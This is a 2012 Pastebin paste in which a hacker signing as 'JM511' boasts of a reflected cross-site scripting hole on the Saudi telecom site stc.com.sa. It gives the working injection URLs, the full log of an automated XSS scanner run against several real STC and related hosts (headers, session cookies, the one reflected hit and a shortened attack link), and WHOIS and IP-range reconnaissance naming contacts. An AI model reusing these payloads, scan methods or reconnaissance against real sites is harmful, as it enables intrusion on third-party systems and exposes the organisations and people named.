API tools faq
paste
Advertisement
Islam-Hacker

stc.com.sa Xss Injection by JM511

Islam-Hacker
Sep 25th, 2012
553
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.33 KB | None | 0 0
raw download clone embed print report
  1. جني محجوز 2002 - 2012
  2. Xss Injection On STC.COM.SA
  3. جني محجوز , انجكتور , زومبي , شيخ الهكر
  4.  
  5. JM511 ;) + ;) in3ctor
  6. STC.Com.Sa .. was Xss ;) by JM511
  7. When You already to fixing Ur Xss ;) LEt JM511 Know ;)
  8. FreeJob ;) Follow me : www.twitter.com/JM511
  9. [email protected] - 21EB3DBB
  10. My Site :> www.in3ctor.com
  11. @JM511 , @in3ctor .. Viva Q8
  12. عاطل ومتمرس :)
  13. ############################## www.stc.com.sa #############################
  14. Hacked by JM511" name="searchFormTopindex" method="get" style="display:inline" onsubmit="searchSubmit();">
  15.  
  16. WoooW
  17. Xss Injection :)
  18. I Love It ;)
  19.  
  20. http://www.stc.com.sa/cws/portal/ar/individual/ind-aljawal/ind-alj-start/%22%3EHacked%20by%20JM511
  21.  
  22.  
  23. ===========================================================================
  24. Target: http://www.stc.com.sa/cws/portal/en/?favouritLang=en --> 2012-09-25 17:14:15.299907
  25. ===========================================================================
  26.  
  27. ---------------------------------------------
  28. [-] Hashing: 2455d2bab5ee85a10e6470da98d629de
  29. [+] Trying: http://www.stc.com.sa/cws/portal/en/?favouritLang=en/">2455d2bab5ee85a10e6470da98d629de
  30. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  31. [-] Headers Results:
  32.  
  33. Date: Tue, 25 Sep 2012 14:14:19 GMT
  34. Server: Apache
  35. Cache-Control: no-cache="Set-Cookie", max-age=600
  36. Location: http://www.stc.com.sa/cws/portal/en/stc/stc-hidden/stc-data-error
  37. Set-Cookie: JSESSIONID=jtCnQh8GjDSnTGl1YZ1HYmSl82pND2f2LrzLhDM5dyJFQd6D2n7z!-1020864940; path=/
  38. X-Powered-By: Servlet/2.5 JSP/2.1
  39. Expires: Tue, 25 Sep 2012 14:24:19 GMT
  40. Vary: Accept-Encoding,User-Agent
  41. X-UA-Compatible: IE=edge
  42. Connection: close
  43. http-code: 302
  44. total-time: 0.238672
  45. namelookup-time: 0.078937
  46. connect-time: 0.11953
  47. header-size: 491
  48. request-size: 314
  49. response-code: 302
  50. ssl-verifyresult: 0
  51. content-type: text/html
  52. cookielist: ['www.stc.com.sa\tFALSE\t/\tFALSE\t0\tJSESSIONID\tjtCnQh8GjDSnTGl1YZ1HYmSl82pND2f2LrzLhDM5dyJFQd6D2n7z!-1020864940']
  53.  
  54. ---------------------------------------------
  55. [-] Injection Results:
  56. [+] Checking: url attack with ">PAYLOAD... fail
  57.  
  58. Searching hash: 2455d2bab5ee85a10e6470da98d629de in target source code...
  59.  
  60. Injection failed!
  61.  
  62. ===========================================================================
  63. Target: http://careers.stc.com.sa/ --> 2012-09-25 17:14:15.299907
  64. ===========================================================================
  65.  
  66. ---------------------------------------------
  67. [-] Hashing: cfa3c2b4031495c53d25fc22203da34c
  68. [+] Trying: http://careers.stc.com.sa/">cfa3c2b4031495c53d25fc22203da34c
  69. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  70. [-] Headers Results:
  71.  
  72. Date: Tue, 25 Sep 2012 14:15:37 GMT
  73. Server: Apache/2.2.22 (Ubuntu)
  74. X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.11
  75. X-Request-Id: eda499af83e0614a0c93ec7cfed82bbc
  76. X-Runtime: 0.005188
  77. X-Rack-Cache: miss
  78. Status: 404
  79. Vary: Accept-Encoding
  80. Content-Length: 5759
  81. Connection: Keep-Alive
  82. http-code: 404
  83. total-time: 0.565648
  84. namelookup-time: 0.220284
  85. connect-time: 0.25633
  86. header-size: 367
  87. request-size: 287
  88. response-code: 404
  89. ssl-verifyresult: 0
  90. content-type: text/html; charset=utf-8
  91. cookielist: []
  92.  
  93. ---------------------------------------------
  94. [-] Injection Results:
  95.  
  96. 404 Not Found: The server has not found anything matching the Request-URI
  97.  
  98.  
  99.  
  100. ===========================================================================
  101. Target: http://www.stc.com.sa/ --> 2012-09-25 17:14:15.299907
  102. ===========================================================================
  103.  
  104. ---------------------------------------------
  105. [-] Hashing: 1972799943d680d5cd6eb226199c27ee
  106. [+] Trying: http://www.stc.com.sa/">1972799943d680d5cd6eb226199c27ee
  107. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  108. [-] Headers Results:
  109.  
  110. Date: Tue, 25 Sep 2012 14:14:28 GMT
  111. Server: Apache
  112. Content-Length: 240
  113. Keep-Alive: timeout=2, max=200
  114. Connection: Keep-Alive
  115. http-code: 404
  116. total-time: 0.260906
  117. namelookup-time: 0.068524
  118. connect-time: 0.1257
  119. header-size: 201
  120. request-size: 283
  121. response-code: 404
  122. ssl-verifyresult: 0
  123. content-type: text/html; charset=iso-8859-1
  124. cookielist: []
  125.  
  126. ---------------------------------------------
  127. [-] Injection Results:
  128.  
  129. 404 Not Found: The server has not found anything matching the Request-URI
  130.  
  131. ===========================================================================
  132. Target: http://www.stc.com.sa/cws/portal/en/individual?favouritLang=en --> 2012-09-25 17:14:15.299907
  133. ===========================================================================
  134.  
  135. ---------------------------------------------
  136. [-] Hashing: 17ee0834a0869c7eb3715bfc85491645
  137. [+] Trying: http://www.stc.com.sa/cws/portal/en/individual?favouritLang=en/">17ee0834a0869c7eb3715bfc85491645
  138. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  139. [-] Headers Results:
  140.  
  141. Date: Tue, 25 Sep 2012 14:14:30 GMT
  142. Server: Apache
  143. Cache-Control: no-cache="Set-Cookie", max-age=600
  144. Location: http://www.stc.com.sa/cws/portal/en/stc/stc-hidden/stc-data-error
  145. Set-Cookie: JSESSIONID=9ZHCQh8Tp2zCTFppWhbXwN28qTPXLmKFMp59cPv3xzb6vd1wRvb6!431507543; path=/
  146. X-Powered-By: Servlet/2.5 JSP/2.1
  147. Expires: Tue, 25 Sep 2012 14:24:30 GMT
  148. Vary: Accept-Encoding,User-Agent
  149. X-UA-Compatible: IE=edge
  150. Connection: close
  151. http-code: 302
  152. total-time: 0.181937
  153. namelookup-time: 0.068722
  154. connect-time: 0.120254
  155. header-size: 489
  156. request-size: 324
  157. response-code: 302
  158. ssl-verifyresult: 0
  159. content-type: text/html
  160. cookielist: ['www.stc.com.sa\tFALSE\t/\tFALSE\t0\tJSESSIONID\t9ZHCQh8Tp2zCTFppWhbXwN28qTPXLmKFMp59cPv3xzb6vd1wRvb6!431507543']
  161.  
  162. ---------------------------------------------
  163. [-] Injection Results:
  164. [+] Checking: url attack with ">PAYLOAD... fail
  165.  
  166. Searching hash: 17ee0834a0869c7eb3715bfc85491645 in target source code...
  167.  
  168. Injection failed!
  169.  
  170. ===========================================================================
  171. Target: http://www.stc.com.sa/cws/portal/ar/ --> 2012-09-25 17:14:15.299907
  172. ===========================================================================
  173.  
  174. ---------------------------------------------
  175. [-] Hashing: f65755bd001eb9029399f6813dc96d0e
  176. [+] Trying: http://www.stc.com.sa/cws/portal/ar/">f65755bd001eb9029399f6813dc96d0e
  177. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  178. [-] Headers Results:
  179.  
  180. Date: Tue, 25 Sep 2012 14:14:24 GMT
  181. Server: Apache
  182. Cache-Control: no-cache="Set-Cookie", max-age=600
  183. Set-Cookie: JSESSIONID=q21GQh8LRhfjp4x27Bt883hdZBKDGd1vjpkkHnH6H15Ws2Sfxxn4!933324500; path=/
  184. X-Powered-By: Servlet/2.5 JSP/2.1
  185. Expires: Tue, 25 Sep 2012 14:24:24 GMT
  186. Vary: Accept-Encoding,User-Agent
  187. X-UA-Compatible: IE=edge
  188. Connection: close
  189. http-code: 200
  190. total-time: 6.027491
  191. namelookup-time: 0.078538
  192. connect-time: 0.103068
  193. header-size: 411
  194. request-size: 297
  195. response-code: 200
  196. ssl-verifyresult: 0
  197. content-type: text/html;charset=UTF-8
  198. cookielist: ['www.stc.com.sa\tFALSE\t/\tFALSE\t0\tJSESSIONID\tq21GQh8LRhfjp4x27Bt883hdZBKDGd1vjpkkHnH6H15Ws2Sfxxn4!933324500']
  199.  
  200. ---------------------------------------------
  201. [-] Injection Results:
  202. [+] Checking: url attack with ">PAYLOAD... ok
  203.  
  204. Searching hash: f65755bd001eb9029399f6813dc96d0e in target source code...
  205.  
  206. This injection is reflected by target, so can be a vulnerability!! :)
  207.  
  208. Try a --reverse-check connection to validate that is 100% vulnerable
  209.  
  210. ===========================================================================
  211. Target: http://www.m3com.com.sa/en --> 2012-09-25 17:14:15.299907
  212. ===========================================================================
  213.  
  214. ---------------------------------------------
  215. [-] Hashing: 9fb3dc4c7f68a70ae8a8c01e077fa161
  216. [+] Trying: http://www.m3com.com.sa/en/">9fb3dc4c7f68a70ae8a8c01e077fa161
  217. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  218. [-] Headers Results:
  219.  
  220. Cache-Control: public, max-age=2700
  221. Expires: Tue, 25 Sep 2012 14:59:32 GMT
  222. Last-Modified: Tue, 25 Sep 2012 14:14:24 +0000
  223. Server: Footprint Distributor V4.8
  224. Vary: Cookie,Accept-Encoding,X-Device,User-Agent
  225. V-age: 0
  226. V-Cache: MISS
  227. V-TTL: 2700.000
  228. X-Device: desktop
  229. X-Varnish: 71448758
  230. Your-IP: 4.26.232.137
  231. Date: Tue, 25 Sep 2012 14:14:32 GMT
  232. Age: 0
  233. Connection: close
  234. Set-Cookie: ARPT=KJWMVQS10.10.29.13CKKUL; path=/
  235. http-code: 404
  236. total-time: 8.516019
  237. namelookup-time: 0.07884
  238. connect-time: 0.136633
  239. header-size: 496
  240. request-size: 288
  241. response-code: 404
  242. ssl-verifyresult: 0
  243. content-type: text/html; charset=utf-8
  244. cookielist: ['www.m3com.com.sa\tFALSE\t/\tFALSE\t0\tARPT\tKJWMVQS10.10.29.13CKKUL']
  245.  
  246. ---------------------------------------------
  247. [-] Injection Results:
  248.  
  249. 404 Not Found: The server has not found anything matching the Request-URI
  250.  
  251. ===========================================================================
  252.  
  253. ---------------------------------------------
  254. [-] Injection Results:
  255.  
  256. 404 Not Found: The server has not found anything matching the Request-URI
  257.  
  258. Mosquito(s) landed!
  259.  
  260.  
  261. ===========================================================================
  262. [*] Final Results:
  263. ===========================================================================
  264.  
  265. - Injections: 10
  266. - Failed: 9
  267. - Sucessfull: 1
  268. - Accur: 10 %
  269.  
  270. ===========================================================================
  271. [*] List of possible XSS injections:
  272. ===========================================================================
  273.  
  274. [/] Shortered URL (Injection): http://is.gd/EInKlo
  275. [I] Target: http://www.stc.com.sa/cws/portal/ar/
  276. [+] Injection: http://www.stc.com.sa/cws/portal/ar/">f65755bd001eb9029399f6813dc96d0e
  277. [-] Method: xss
  278. [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  279. --------------------------------------------------
  280.  
  281. [!] Trying to publish on: https://identi.ca/xsserbot01
  282. ===========================================================================
  283. [*] Statistic:
  284. ===========================================================================
  285. --------------------------------------------------
  286. Test Time Duration: 0:00:24.900331
  287. --------------------------------------------------
  288. Total Connections: 20
  289. -------------------------
  290. 200-OK: 14 | 404: 6 | 503: 0 | Others: 0
  291. Connec: 70 %
  292. --------------------------------------------------
  293. Total Payloads: 10
  294. -------------------------
  295. Checker: 0 | Manual: 0 | Auto: 10 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
  296. --------------------------------------------------
  297. Total Injections: 10
  298. -------------------------
  299. Failed: 9 | Sucessfull: 1
  300. Accur : 10 %
  301. -------------------------
  302. Total Discovered: 1
  303. -------------------------
  304. Checker: 0 | Manual: 0 | Auto: 1 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
  305. --------------------------------------------------
  306. False positives: 0 | Vulnerables: 1
  307. -------------------------
  308. Mana: 24500
  309. --------------------------------------------------
  310.  
  311. [I] Error publishing some discovered XSS injections
  312.  
  313.  
  314.  
  315. :) GoodBye Admin ;) Was Here )(JM511)(
  316. ===============================================
  317.  
  318. hacked by jm511" name="searchFormTopindex" method="get" style="display:inline" onsubmit="searchSubmit();">
  319.  
  320. http://www.stc.com.sa/cws/portal/ar/%22%3Ehacked%20by%20jm511
  321.  
  322. ================================================
  323.  
  324. STC.COM.SA
  325.  
  326. الداتا سنتر تبع الstc
  327. [Search Query: stc.com.sa, Whois Server Used: saudinic.net]
  328.  
  329. ####################
  330.  
  331.  
  332. تمام الحين نبحث عن الداتا سنتر تبع saudinic.net
  333.  
  334. Registrant:
  335. Info Highway Corp.
  336. P.O. Box 90733
  337. Riyadh, Central 11623
  338. SA
  339. 966-1-452-8015
  340. Fax:966-1-452-8127
  341.  
  342.  
  343. Domain Name: SAUDINIC.NET
  344.  
  345. Administrative Contact:
  346. Abu-Durrah, Samer [email protected]
  347. P.O. Box 90733
  348. Riyadh, Central 11623
  349. SA
  350. 966-1-452-8015
  351. Fax:966-1-452-8127
  352.  
  353.  
  354. Technical Contact:
  355. Abu-Durrah, Samer [email protected]
  356. P.O. Box 90733
  357. Riyadh, Central 11623
  358. SA
  359. 966-1-452-8015
  360. Fax:966-1-452-8127
  361.  
  362.  
  363. Record last updated 03-27-2010 09:52:14 PM
  364. Record expires on 03-15-2012
  365. Record created on 03-15-2000
  366.  
  367. Domain servers in listed order:
  368. NS1.MYDOMAIN.COM 64.94.117.193
  369. NS2.MYDOMAIN.COM 64.94.31.67
  370. NS3.MYDOMAIN.COM 66.150.161.137
  371. NS4.MYDOMAIN.COM 63.251.83.74
  372.  
  373. ####################
  374.  
  375. معلومات عن saudimasters.com
  376. Record last updated 02-13-2010 08:33:02 AM
  377. Record expires on 01-27-2012
  378. Record created on 01-27-1999
  379.  
  380. Domain servers in listed order:
  381. NS1.ARABSERVERS.NET 216.157.145.10
  382. NS2.ARABSERVERS.NET 216.157.145.11
  383. NS3.ARABSERVERS.NET 216.157.145.13
  384. NS4.ARABSERVERS.NET 216.157.145.12
  385. ######################
  386.  
  387.  
  388.  
  389. 212.0.0.0 - 213.255.255.255
  390.  
  391. RIPE NCC
  392. European Regional Registry
  393. European Union
  394.  
  395. RIPE NCC Registration Services Department
  396. RIPE Network Coordination Centre
  397. P.O. Box 10096
  398. 1001 EB Amsterdam
  399. the Netherlands
  400. phone: +31 20 535 4444
  401. fax: +31 20 535 4445
  402. [email protected]
  403.  
  404. RIPE NCC Registration Services Department
  405. RIPE Network Coordination Centre
  406. P.O. Box 10096
  407. 1001 EB Amsterdam
  408. the Netherlands
  409. phone: +31 20 535 4444
  410. fax: +31 20 535 4445
  411. [email protected]
  412.  
  413. RIPE NCC Operations
  414. Singel 258
  415. 1016 AB Amsterdam
  416. The Netherlands
  417. phone: +31 20 535 4444
  418. fax: +31 20 535 4445
  419. [email protected]
  420.  
  421. [email protected]
  422. [email protected]
  423.  
  424. EU-ZZ-212-213
  425. Updated: 09-Dec-2004
  426. Source: whois.ripe.net
  427. Completed at 6/12/2011 1:26:05 AM
  428. Processing time: 0.00 seconds
  429.  
  430.  
  431. ########################
  432.  
  433.  
  434. 212.118.128.0 - 212.118.159.255
  435.  
  436. SaudiNet, Saudi Telecom Company
  437. Saudi Arabia
  438.  
  439. Saudi Telecom Co. Registry Admin-C contact
  440. King Fahad Road, Abraj Atta'awuneya(NCCI Building), South Tower, 4th floor, Saudi Net
  441. P.O.Box: 295997
  442. Riyadh 11351
  443. Saudi Arabia
  444. phone: +966-1-218-0300
  445. fax: +966-1-218-0311
  446. [email protected]
  447.  
  448. Saudi Telecom Co. Registry Tech-C contact
  449. King Fahad Road, Abraj Atta'awuneya(NCCI Building), South Tower, 4th floor, Saudi Net
  450. P.O.Box: 295997
  451. Riyadh 11351
  452. Saudi Arabia
  453. phone: +966-1-218-0300
  454. fax: +966-1-218-0311
  455. [email protected]
  456.  
  457. Suliman I. Al-Zain
  458. Saudi Telecom Co. (SaudiNet)
  459. P.O.Box: 295997, Riyadh 11351, Saudi Arabia.
  460. phone: +9661 218 2034
  461. fax: +9661 218 0311
  462. [email protected]
  463.  
  464. For any Abuse or Spam Please send an email to abuse @saudi.net.sa
  465. For any Abuse or Spamming please send your requests directly to [email protected]
  466. For any Abuse or Spamming please send your reques
  467.  
  468. SA-STC-981209
  469. Updated: 12-Jan-2006
  470. Source: whois.ripe.net
  471. Completed at 6/12/2011 1:26:05 AM
  472. Processing time: 0.00 seconds
  473.  
  474.  
  475. ####################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!